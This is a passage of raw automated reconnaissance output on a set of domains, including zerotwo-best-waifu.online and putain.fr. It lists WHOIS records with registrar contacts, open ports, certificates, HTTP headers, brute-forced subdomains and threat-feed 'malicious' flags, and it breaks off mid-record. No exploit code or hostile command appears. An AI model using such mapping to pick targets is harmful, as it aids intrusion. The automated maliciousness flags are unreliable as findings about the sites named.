15:2e:45:32:25:68:c3:f7:9c:53:f8:b9:69:7b:8a:0e:27:5e: 8e:8c:9c:98:c5:ad:33:67:02:7f:98:09 2022-12-18 00:06:51 Open TCP Port No Pulsedive 0 0 2 0 None 172.67.137.37:80 172.67.137.37 2022-12-18 00:04:10 SSL Certificate - Issued to No SSL Certificate Analyzer 1 0 2 0 None C=US,ST=California,L=San Francisco,O=Cloudflare\, Inc.,CN=sni.cloudflaressl.com 188.114.96.0 2022-12-18 00:13:48 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None domregteam3@eurodns.com %% %% This is the AFNIC Whois server. %% %% complete date format: YYYY-MM-DDThh:mm:ssZ %% %% Rights restricted by copyright. %% See https://www.afnic.fr/en/domain-names-and-support/everything-there-is-to-know-about-domain-names/find-a-domain-name-or-a-holder-using-whois/ %% %% Use '-h' option to obtain more information about this service. %% domain: putain.fr status: ACTIVE eppstatus: active hold: NO holder-c: ES5624-FRNIC admin-c: ES5623-FRNIC tech-c: AA4055-FRNIC registrar: EURODNS S.A. Expiry Date: 2023-05-04T07:57:38Z created: 2009-01-15T07:26:19Z last-update: 2022-06-20T12:09:11Z source: FRNIC nserver: ns1.eurodns.com nserver: ns2.eurodns.com source: FRNIC registrar: EURODNS S.A. address: Array address: L-3372 LEUDELANGE country: LU phone: +352.2637251 e-mail: registryinfo@eurodns.com website: http://www.eurodns.com anonymous: No registered: 2003-09-22T00:00:00Z source: FRNIC nic-hdl: AA4055-FRNIC type: PERSON contact: Anouar Adlani address: EuroDNS SA address: 24 rue Leon Laval address: L-3372 Leudelange country: LU phone: +352.2637252 fax-no: +352.26372537 e-mail: staff@eurodns.com registrar: EURODNS S.A. changed: 2022-12-16T09:25:25.326593Z anonymous: NO obsoleted: NO eppstatus: associated eppstatus: active eligstatus: not identified reachstatus: not identified source: FRNIC nic-hdl: ES5624-FRNIC type: ORGANIZATION contact: EuroDNS S.A. address: EuroDNS S.A. address: 2, rue Leon Laval address: L-3372 Leudelange country: LU phone: +352.263725200 fax-no: +352.26372537 e-mail: domregteam3@eurodns.com registrar: EURODNS S.A. changed: 2015-09-24T11:47:25Z anonymous: NO obsoleted: NO eppstatus: associated eppstatus: active eligstatus: not identified reachstatus: not identified source: FRNIC nic-hdl: ES5623-FRNIC type: ORGANIZATION contact: EuroDNS S.A. address: EuroDNS S.A. address: 2, rue Leon Laval address: L-3372 Leudelange country: LU phone: +352.263725200 fax-no: +352.26372537 e-mail: domregteam3@eurodns.com registrar: EURODNS S.A. changed: 2015-09-24T11:47:26Z anonymous: NO obsoleted: NO eppstatus: associated eppstatus: active eligstatus: not identified reachstatus: not identified source: FRNIC >>> WHOIS request date: 2022-12-18T00:11:07.410349Z <<< 2022-12-18 00:21:02 Open TCP Port No Censys 0 0 2 0 None 104.21.28.240:2096 104.21.28.240 2022-12-18 00:08:42 Malicious IP on Same Subnet Yes CleanTalk Spam List 0 0 3 0 None CleanTalk Spam List [81.88.48.0/20] https://iplists.firehol.org/files/cleantalk_7d.ipset 81.88.48.0/20 2022-12-18 00:03:05 Affiliate - IP Address No DNS Look-aside 1 0 2 0 None 90.116.166.111 90.116.166.104 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None serviciosbancpichinchacomecu--ecuador0.repl.co 34.149.204.188 2022-12-18 00:21:06 Raw Data from RIRs No Censys 0 0 2 0 None {"last_updated_at": "2022-12-17T23:35:44.052Z", "ip": "172.67.147.230", "location_updated_at": "2022-12-10T07:08:41.264508Z", "autonomous_system_updated_at": "2022-12-06T09:10:52.468541Z", "location": {"country": "United States", "coordinates": {"latitude": 37.751, "longitude": -97.822}, "registered_country": "United States", "registered_country_code": "US", "postal_code": "", "country_code": "US", "timezone": "America/Chicago", "continent": "North America"}, "dns": {"records": {"mail.upzmujahidinkalbar.com": {"record_type": "A", "resolved_at": "2022-11-27T14:00:56.071530334Z"}, "quitranar.ml": {"record_type": "A", "resolved_at": "2022-12-07T15:46:34.241206539Z"}, "tilburg-zonnepaneel.nl": {"record_type": "A", "resolved_at": "2022-11-29T16:34:05.587034691Z"}, "www.e-curtainhouse.com": {"record_type": "A", "resolved_at": "2022-10-09T13:20:14.433946877Z"}, "new.dalvinder.xyz": {"record_type": "A", "resolved_at": "2022-12-15T17:22:59.386173414Z"}, "efileperm.com": {"record_type": "A", "resolved_at": "2022-12-09T13:18:47.471783046Z"}, "riseboro.org": {"record_type": "A", "resolved_at": "2022-12-04T17:01:30.547466207Z"}, "webmail.fancyacake.net": {"record_type": "A", "resolved_at": "2022-12-07T16:18:29.035790767Z"}, "update.wpvivid.com": {"record_type": "A", "resolved_at": "2022-12-06T04:51:56.379698765Z"}, "www.riseboro.org": {"record_type": "A", "resolved_at": "2022-12-05T16:46:55.187302730Z"}, "consuggtolacar.tk": {"record_type": "A", "resolved_at": "2022-12-08T16:57:17.976506713Z"}, "emiliesteban.com": {"record_type": "A", "resolved_at": "2022-12-02T13:27:01.611968342Z"}, "anininfio.ml": {"record_type": "A", "resolved_at": "2022-12-06T16:03:13.345248276Z"}, "cpcontacts.sectraexpress.com": {"record_type": "A", "resolved_at": "2022-11-29T13:58:34.097869492Z"}, "theoutermostbrewhouse.com": {"record_type": "A", "resolved_at": "2022-11-17T13:55:21.891733439Z"}, "gsb.group": {"record_type": "A", "resolved_at": "2022-12-10T14:35:16.342630588Z"}, "contkakenestloonsui.tk": {"record_type": "A", "resolved_at": "2022-11-26T21:52:37.207837340Z"}, "neva.news": {"record_type": "A", "resolved_at": "2022-12-11T16:31:31.034925098Z"}, "chondharbalege.ga": {"record_type": "A", "resolved_at": "2022-11-22T15:25:05.326318931Z"}, "www.myjoyofliving.com": {"record_type": "A", "resolved_at": "2022-12-06T13:59:10.503989250Z"}, "fetch-an-in-laptops-hindi.fyi": {"record_type": "A", "resolved_at": "2022-12-14T15:13:14.662634430Z"}, "cpcalendars.webelievenow.com": {"record_type": "A", "resolved_at": "2022-11-30T14:17:36.399825699Z"}, "nevereveremma.com": {"record_type": "A", "resolved_at": "2022-12-07T00:42:45.561323960Z"}, "hormonewellnesscourse.com": {"record_type": "A", "resolved_at": "2022-12-08T13:25:49.088906678Z"}, "persiapanmasukptn.com": {"record_type": "A", "resolved_at": "2022-12-03T13:54:49.453799338Z"}, "cpcontacts.algoritmoexpert.com.br": {"record_type": "A", "resolved_at": "2022-12-10T12:12:10.879895874Z"}, "holistic-holidays.com": {"record_type": "A", "resolved_at": "2022-11-20T13:29:50.235437517Z"}, "a-prime-us-credit-cards.zone": {"record_type": "A", "resolved_at": "2022-12-10T19:10:07.986427709Z"}, "bongocat.click": {"record_type": "A", "resolved_at": "2022-09-28T12:37:32.167148526Z"}, "leaseislim.com": {"record_type": "A", "resolved_at": "2022-12-11T13:42:12.341163044Z"}, "www.hubenglish.com": {"record_type": "CNAME", "resolved_at": "2022-11-12T13:23:00.315871231Z"}, "www.irfay.com": {"record_type": "A", "resolved_at": "2022-12-15T13:29:47.863991120Z"}, "mail.batonrougekennelclub.com": {"record_type": "A", "resolved_at": "2022-12-11T13:12:16.359208221Z"}, "www.multpaineis.com.br": {"record_type": "A", "resolved_at": "2022-12-13T12:17:18.074275378Z"}, "tadratallureworkshop.com": {"record_type": "A", "resolved_at": "2022-12-14T14:28:44.431583448Z"}, "cpanel.sectraexpress.com": {"record_type": "A", "resolved_at": "2022-12-09T14:02:13.774105248Z"}, "cpcalendars.algoritmoexpert.com.br": {"record_type": "A", "resolved_at": "2022-12-16T12:14:10.984577406Z"}, "webminders.it": {"record_type": "A", "resolved_at": "2022-12-04T15:14:16.127245896Z"}, "fatosbrasil.com.br": {"record_type": "A", "resolved_at": "2022-11-22T12:16:24.488082020Z"}, "ontontocaltersla.tk": {"record_type": "A", "resolved_at": "2022-11-14T16:49:07.690130423Z"}, "thenheppsinforddantca.tk": {"record_type": "A", "resolved_at": "2022-12-09T16:45:26.377109728Z"}, "betdarmbattnebac.tk": {"record_type": "A", "resolved_at": "2022-11-25T17:21:28.898975806Z"}, "yquqxrm.tk": {"record_type": "A", "resolved_at": "2022-12-13T00:24:31.856245021Z"}, "cpanel.protipsnetbd.com": {"record_type": "A", "resolved_at": "2022-10-29T18:59:35.908349611Z"}, "opantupa.tk": {"record_type": "A", "resolved_at": "2022-11-25T17:23:00.565856379Z"}, "tticarotliesan.ml": {"record_type": "A", "resolved_at": "2022-11-19T15:09:51.128787748Z"}, "solidnmr.hu": {"record_type": "A", "resolved_at": "2022-12-02T15:08:14.087465067Z"}, "payswix.net": {"record_type": "A", "resolved_at": "2022-11-30T16:10:06.525978748Z"}, "meovanew.tk": {"record_type": "A", "resolved_at": "2022-12-14T17:42:19.596891632Z"}, "en.sapnemedekhna.com": {"record_type": "A", "resolved_at": "2022-12-06T14:21:24.557280221Z"}, "beeorganic.us": {"record_type": "A", "resolved_at": "2022-11-15T16:26:23.105182582Z"}, "clutuniphitan.tk": {"record_type": "A", "resolved_at": "2022-12-12T21:11:40.460069897Z"}, "hjnjq.com": {"record_type": "A", "resolved_at": "2022-11-16T13:27:49.652192119Z"}, "www.standrewslean.com": {"record_type": "A", "resolved_at": "2022-12-11T14:18:35.859066431Z"}, "banadislifo.tk": {"record_type": "A", "resolved_at": "2022-11-22T16:56:32.784672802Z"}, "greatcasthid.ga": {"record_type": "A", "resolved_at": "2022-10-05T15:08:16.386848914Z"}, "portgenpill.tk": {"record_type": "A", "resolved_at": "2022-12-08T13:39:15.894610809Z"}, "blogcast.support": {"record_type": "A", "resolved_at": "2022-12-04T17:20:24.016832384Z"}, "turdadissitedri.ga": {"record_type": "A", "resolved_at": "2022-11-16T14:52:23.820492206Z"}, "webdisk.algoritmoexpert.com.br": {"record_type": "A", "resolved_at": "2022-12-02T12:18:13.327934825Z"}, "johnparkeraesthetics.com": {"record_type": "A", "resolved_at": "2022-12-14T13:44:36.052499508Z"}, "davisresearch.org": {"record_type": "A", "resolved_at": "2022-11-25T16:58:47.029248229Z"}, "webdisk.nensi.eu": {"record_type": "A", "resolved_at": "2022-11-13T14:26:06.988304058Z"}, "warmodeon.com": {"record_type": "A", "resolved_at": "2022-12-10T14:04:27.488932415Z"}, "gamewinwin.net": {"record_type": "A", "resolved_at": "2022-12-15T16:02:24.221785118Z"}, "webmail.dialectict.nl": {"record_type": "A", "resolved_at": "2022-11-29T16:33:27.083591618Z"}, "tiaronamescio.tk": {"record_type": "A", "resolved_at": "2022-12-16T16:42:57.572866945Z"}, "wild-fire-3893.2864713421.workers.dev": {"record_type": "A", "resolved_at": "2022-12-15T14:33:28.163019076Z"}, "geolapkimblomid.tk": {"record_type": "A", "resolved_at": "2022-09-28T19:07:16.273366860Z"}, "www.bettingmarket.org": {"record_type": "A", "resolved_at": "2022-12-07T17:08:23.110463705Z"}, "upzmujahidinkalbar.com": {"record_type": "A", "resolved_at": "2022-11-29T14:12:38.043402115Z"}, "tlosguaconfma.cf": {"record_type": "A", "resolved_at": "2022-12-10T12:28:48.978211423Z"}, "cpanel.theerathornnft.com": {"record_type": "A", "resolved_at": "2022-11-20T14:11:12.522505839Z"}, "sensatravel.info": {"record_type": "A", "resolved_at": "2022-12-07T18:33:52.634075353Z"}, "xewapuda.rest": {"record_type": "A", "resolved_at": "2022-10-23T17:07:42.738597699Z"}, "brasfaberk.ga": {"record_type": "A", "resolved_at": "2022-12-12T01:18:17.897930376Z"}, "www.majeronibraces.com": {"record_type": "A", "resolved_at": "2022-11-26T13:38:16.539310269Z"}, "www.hookup.directory": {"record_type": "A", "resolved_at": "2022-12-14T15:00:30.848178149Z"}, "lagostechweek.ng": {"record_type": "A", "resolved_at": "2022-12-05T16:40:44.108614046Z"}, "majeronibraces.com": {"record_type": "A", "resolved_at": "2022-12-16T13:31:16.728181958Z"}, "freelancejobsdb.com": {"record_type": "A", "resolved_at": "2022-11-22T09:21:04.975125532Z"}, "gamedancer.com": {"record_type": "A", "resolved_at": "2022-12-05T13:24:48.451841013Z"}, "hookup.directory": {"record_type": "A", "resolved_at": "2022-12-02T14:51:20.104694579Z"}, "cloudzeroseven.com": {"record_type": "A", "resolved_at": "2022-11-25T13:14:29.278842680Z"}, "diabottsassou.ga": {"record_type": "A", "resolved_at": "2022-12-14T15:13:01.041649671Z"}, "cansundemir.com": {"record_type": "A", "resolved_at": "2022-12-14T13:17:59.610572794Z"}, "deedattractiveauthority.quest": {"record_type": "A", "resolved_at": "2022-09-29T22:33:59.901364108Z"}, "www.carstenjohnsen.org": {"record_type": "A", "resolved_at": "2022-12-16T16:24:49.705500452Z"}, "www.lovepaper.org.au": {"record_type": "A", "resolved_at": "2022-12-11T12:15:23.828613355Z"}, "db.web.koongroup.com": {"record_type": "A", "resolved_at": "2022-12-13T13:41:23.435566162Z"}, "forgetfulcorn.xyz": {"record_type": "A", "resolved_at": "2022-12-16T16:53:12.007013166Z"}, "fototayland.ru": {"record_type": "A", "resolved_at": "2022-12-11T16:48:25.638065248Z"}, "www.makecoloradohome.com": {"record_type": "A", "resolved_at": "2022-12-13T13:44:08.455137791Z"}, "mail.algoritmoexpert.com.br": {"record_type": "A", "resolved_at": "2022-11-18T12:15:11.721015572Z"}, "prabinkumarmahato.com.np": {"record_type": "A", "resolved_at": "2022-11-19T16:16:56.449332581Z"}, "fatootaconssac.cf": {"record_type": "A", "resolved_at": "2022-12-12T12:26:52.345682761Z"}, "fancyacake.net": {"record_type": "A", "resolved_at": "2022-11-30T15:56:40.221799680Z"}, "purplepapaya.ga": {"record_type": "A", "resolved_at": "2022-12-02T15:05:00.676061294Z"}, "artopicolma.tk": {"record_type": "A", "resolved_at": "2022-11-19T16:34:56.998683369Z"}, "tg.news": {"record_type": "A", "resolved_at": "2022-12-09T16:17:30.852668666Z"}}, "names": ["a-prime-us-credit-cards.zone", "meovanew.tk", "theoutermostbrewhouse.com", "fancyacake.net", "cansundemir.com", "tilburg-zonnepaneel.nl", "www.hookup.directory", "www.myjoyofliving.com", "purplepapaya.ga", "cpanel.theerathornnft.com", "johnparkeraesthetics.com", "cpcontacts.sectraexpress.com", "mail.batonrougekennelclub.com", "tiaronamescio.tk", "hormonewellnesscourse.com", 172.67.147.230 2022-12-18 00:11:01 Similar Domain - Whois No Whois 1 0 2 0 None Domain Name: y.wtf Registry Domain ID: 2621e215e11c46369a501d648eada907-DONUTS Registrar WHOIS Server: whois.1api.net Registrar URL: http://www.1api.net Updated Date: 2022-08-24T17:01:40Z Creation Date: 2015-07-10T17:01:07Z Registry Expiry Date: 2023-07-10T17:01:07Z Registrar: 1API GmbH Registrar IANA ID: 1387 Registrar Abuse Contact Email: abuse@1api.net Registrar Abuse Contact Phone: +49.68949396850 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: xTom GmbH Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: North Rhine-Westphalia Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: DE Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: kate.ns.cloudflare.com Name Server: merlin.ns.cloudflare.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:11:01Z <<< For more information on Whois status codes, please visit https://icann.org/epp Terms of Use: Identity Digital Inc. provides this Whois service for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Identity Digital does not guarantee its accuracy. Users accessing the Identity Digital Whois service agree to use the data only for lawful purposes, and under no circumstances may this data be used to: a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the registrar's own existing customers and b) enable high volume, automated, electronic processes that send queries or data to the systems of Identity Digital or any ICANN-accredited registrar, except as reasonably necessary to register domain names or modify existing registrations. When using the Identity Digital Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/ Identity Digital Inc. reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. Domain Name: Y.WTF Registry Domain ID: 2621e215e11c46369a501d648eada907-DONUTS Registrar WHOIS Server: whois.1api.net Registrar URL: http://www.1api.net Updated Date: 2022-08-24T17:01:40Z Creation Date: 2015-07-10T17:01:07Z Registrar Registration Expiration Date: 2023-07-10T17:01:07Z Registrar: 1API GmbH Registrar IANA ID: 1387 Registrar Abuse Contact Email: abuse@1api.net Registrar Abuse Contact Phone: +49.68949396x850 Domain Status: clientTransferProhibited - http://www.icann.org/epp#clientTransferProhibited Registry Registrant ID: Registrant Name: REDACTED FOR PRIVACY Registrant Organization: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: North Rhine-Westphalia Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: DE Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: contact via https://www.1api.net/send-message/y.wtf/registrant Registry Admin ID: Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: Admin Fax: Admin Fax Ext: Admin Email: contact via https://www.1api.net/send-message/y.wtf/admin Registry Tech ID: Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: Tech Fax: Tech Fax Ext: Tech Email: contact via https://www.1api.net/send-message/y.wtf/tech Name Server: kate.ns.cloudflare.com Name Server: merlin.ns.cloudflare.com DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-18T00:11:01Z <<< For more information on Whois status codes, please visit https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en. ; This data is provided for information purposes, and to assist persons ; obtaining information about or related to domain name registration ; records. We do not guarantee its accuracy. ; By submitting a WHOIS query, you agree that you will use this data ; only for lawful purposes and that, under no circumstances, you will ; use this data to ; 1) allow, enable, or otherwise support the transmission of mass ; unsolicited, commercial advertising or solicitations via E-mail ; (spam); or ; 2) enable high volume, automated, electronic processes that apply ; to this WHOIS server. ; These terms may be changed without prior notice. ; By submitting this query, you agree to abide by this policy. misogyn.y.wtf 2022-12-18 00:40:47 Malicious IP Address Yes VirusTotal 0 0 3 0 None VirusTotal [188.114.96.11] https://www.virustotal.com/en/ip-address/188.114.96.11/information/ 188.114.96.0/24 2022-12-18 00:04:38 Malicious IP Address Yes Maltiverse 0 1 2 0 None Maltiverse [188.114.96.0] 188.114.96.0 2022-12-18 00:04:01 Physical Location No ipstack 0 0 2 0 None Brazil 20.226.83.185 2022-12-18 00:05:54 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.ca plague.fun 2022-12-18 00:18:06 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.1:80 188.114.97.0/24 2022-12-18 00:16:57 Linked URL - Internal No Web Spider 4 0 3 0 None http://webmail.zerotwo-best-waifu.online/css/qbert_theme/template/master.css?v=1.7.0 http://webmail.zerotwo-best-waifu.online/ 2022-12-18 00:18:10 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.3:80 188.114.97.0/24 2022-12-18 00:16:58 HTTP Headers No Web Spider 0 0 4 0 None {"content-length": "89493", "accept-ranges": "bytes", "last-modified": "Wed, 15 Dec 2021 09:50:30 GMT", "connection": "keep-alive", "etag": "\"61b9ba66-15d95\"", "date": "Sun, 18 Dec 2022 00:16:49 GMT", "x-frame-options": "SAMEORIGIN", "content-type": "application/javascript"} http://webmail.zerotwo-best-waifu.online/js/vendor/jquery-3.5.0.min.js 2022-12-18 00:26:44 Malicious IP Address Yes MetaDefender 0 1 2 0 None webroot.com [34.149.204.188] 34.149.204.188 2022-12-18 00:16:54 Malicious Internet Name Yes CloudFlare Malware DNS 0 1 2 0 None Blocked by CloudFlare DNS [autoconfig.zerotwo-best-waifu.online] autoconfig.zerotwo-best-waifu.online 2022-12-18 00:16:59 HTTP Headers No Web Spider 0 0 4 0 None {"content-length": "1305", "accept-ranges": "bytes", "last-modified": "Fri, 12 Feb 2021 14:43:40 GMT", "connection": "keep-alive", "etag": "\"6026941c-519\"", "date": "Sun, 18 Dec 2022 00:16:59 GMT", "x-frame-options": "SAMEORIGIN", "content-type": "text/css"} http://webmail.zerotwo-best-waifu.online/css/qbert_theme/template/custom.css?v=1.7.0 2022-12-18 00:33:43 Open TCP Port No Pulsedive 0 0 4 0 None 195.110.124.188:8443 195.110.124.0/24 2022-12-18 00:27:43 Similar Domain - Whois No Whois 0 0 2 0 None % The WHOIS service offered by ROTLD and the access to the records in the ROTLD WHOIS database % are provided for information purposes and to be used within the scope of technical or administrative % necessities of Internet operation or to remedy legal problems. The use for other purposes, % in particular for advertising and domain hunting, is not permitted. % Without prejudice to the above, it is explicitly forbidden to extract, copy and/or use or re-utilise % in any form and by any means (electronically or not) the whole or a quantitatively or qualitatively % substantial part of the contents of the WHOIS database without prior and explicit permission by ROTLD, % nor in any attempt hereof, to apply automated, electronic processes to ROTLD (or its systems). % ROTLD cannot, under any circumstances, be held liable in case the stored information would prove % to be wrong, incomplete or not accurate in any sense. % You agree that any reproduction and/or transmission of data for commercial purposes will always % be considered as the extraction of a substantial part of the content of the WHOIS database. % By submitting the query you agree to abide by this policy and accept that ROTLD can take measures % to limit the use of its WHOIS services in order to protect the privacy of its registrants or the % integrity of the database. % The ROTLD WHOIS service on port 43 never discloses any information concerning the registrant. % Registrant information can be obtained through use of the web-based whois service available from % the ROTLD website www.rotld.ro Domain Name: plague.ro Registered On: 2019-08-19 Expires On: 2023-08-18 Registrar: ICI - Registrar Referral URL: http://www.rotld.ro DNSSEC: Inactive Nameserver: kami.ns.cloudflare.com Nameserver: donald.ns.cloudflare.com Domain Status: OK plague.ro 2022-12-18 00:11:29 Legal Entity Identifier No GLEIF 0 0 3 0 None 549300F1AETTPWFIQC02 Identity Digital Inc. 2022-12-18 00:06:15 HTTP Headers No Web Spider 1 0 1 0 None {"date": "Sun, 18 Dec 2022 00:06:15 GMT", "content-length": "29", "content-type": "text/html; charset=utf-8", "connection": "close", "server": "Werkzeug/2.2.2 Python/3.9.11"} misogyny.wtf 2022-12-18 00:03:07 Internet Name No DNS Resolver 0 0 2 0 None rasputain.fr Certificate: Data: Version: 3 (0x2) Serial Number: 0f:0e:0e:28:f1:c6:cb:2f:ce:67:1d:a6:c8:b8:7a:b2 Signature Algorithm: ecdsa-with-SHA256 Issuer: C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 Validity Not Before: Jan 17 00:00:00 2022 GMT Not After : Jan 17 23:59:59 2023 GMT Subject: C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:ba:07:4b:f6:cd:75:2e:c1:25:8d:34:ab:3e:b4: aa:17:69:09:33:64:8d:12:4c:78:e7:a9:12:25:17: 21:a5:8d:70:39:49:dd:46:db:8d:c9:8d:58:c6:8b: dc:76:18:a8:1e:77:71:72:01:4a:e8:e3:da:d8:35: 79:51:6a:a1:4f ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Authority Key Identifier: keyid:A5:CE:37:EA:EB:B0:75:0E:94:67:88:B4:45:FA:D9:24:10:87:96:1F X509v3 Subject Key Identifier: 02:2A:86:DC:E3:73:06:B6:9C:5B:CA:6F:78:47:D8:90:1D:C4:4C:66 X509v3 Subject Alternative Name: DNS:rasputain.fr, DNS:*.rasputain.fr, DNS:sni.cloudflaressl.com X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 CRL Distribution Points: Full Name: URI:http://crl3.digicert.com/CloudflareIncECCCA-3.crl Full Name: URI:http://crl4.digicert.com/CloudflareIncECCCA-3.crl X509v3 Certificate Policies: Policy: 2.23.140.1.2.2 CPS: http://www.digicert.com/CPS Authority Information Access: OCSP - URI:http://ocsp.digicert.com CA Issuers - URI:http://cacerts.digicert.com/CloudflareIncECCCA-3.crt X509v3 Basic Constraints: critical CA:FALSE CT Precertificate Poison: critical NULL Signature Algorithm: ecdsa-with-SHA256 30:45:02:20:6f:73:02:9b:eb:82:c0:18:89:d7:54:b9:e8:bf: f7:f2:1a:58:cf:21:10:20:9e:f3:e5:90:50:67:fa:98:63:5a: 02:21:00:90:dd:98:e7:fb:4d:8d:1d:3e:1c:97:37:b2:0c:3e: fe:ac:a8:3e:a2:86:2b:2b:f1:cd:c9:00:51:71:fa:b7:4a 2022-12-18 00:06:21 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.de plague.fun 2022-12-18 00:16:57 Web Content Type No Web Spider 0 0 2 0 None text/html; charset=UTF-8 webmail.zerotwo-best-waifu.online 2022-12-18 00:13:24 Internet Name No DNS Brute-forcer 7 1 1 0 None ftp.zerotwo-best-waifu.online zerotwo-best-waifu.online 2022-12-18 00:16:54 Malicious Internet Name Yes CloudFlare Malware DNS 0 1 2 0 None Blocked by CloudFlare DNS [mail.zerotwo-best-waifu.online] mail.zerotwo-best-waifu.online 2022-12-18 00:03:01 Affiliate - IP Address No DNS Look-aside 1 0 2 0 None 90.116.166.94 90.116.166.104 2022-12-18 00:09:18 Raw Data from RIRs No LeakIX 0 0 2 0 None {u'Services': [{u'protocol': u'https', u'event_type': u'service', u'ip': u'172.67.137.37', u'vendor': u'', u'port': u'443', u'transport': [u'tcp', u'tls', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'172.67.0.0/16'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee98731fedbc44a39cb147fd61faf139899b9326af686a6ba5929dc', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'Raccourcis personnalis\xe9s dans After Effects', u'url': u'', u'header': {u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'TLS_AES_128_GCM_SHA256', u'jarm': u'00000000000000000000000000000000000000000000000000000000000000', u'certificate': {u'domain': [u'*.ridcasib.gq', u'ridcasib.gq'], u'cn': u'*.ridcasib.gq', u'valid': True, u'not_after': u'2023-02-01T17:06:19Z', u'key_size': 256, u'issuer_name': u'E1', u'fingerprint': u'17f90ab081bda153ca6efb07f230a67a13d0390159eb20b845c1f8ccc7494904', u'key_algo': u'ECDSA', u'not_before': u'2022-11-03T17:06:20Z'}, u'enabled': True, u'detected': False, u'version': u'TLSv1.3'}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', 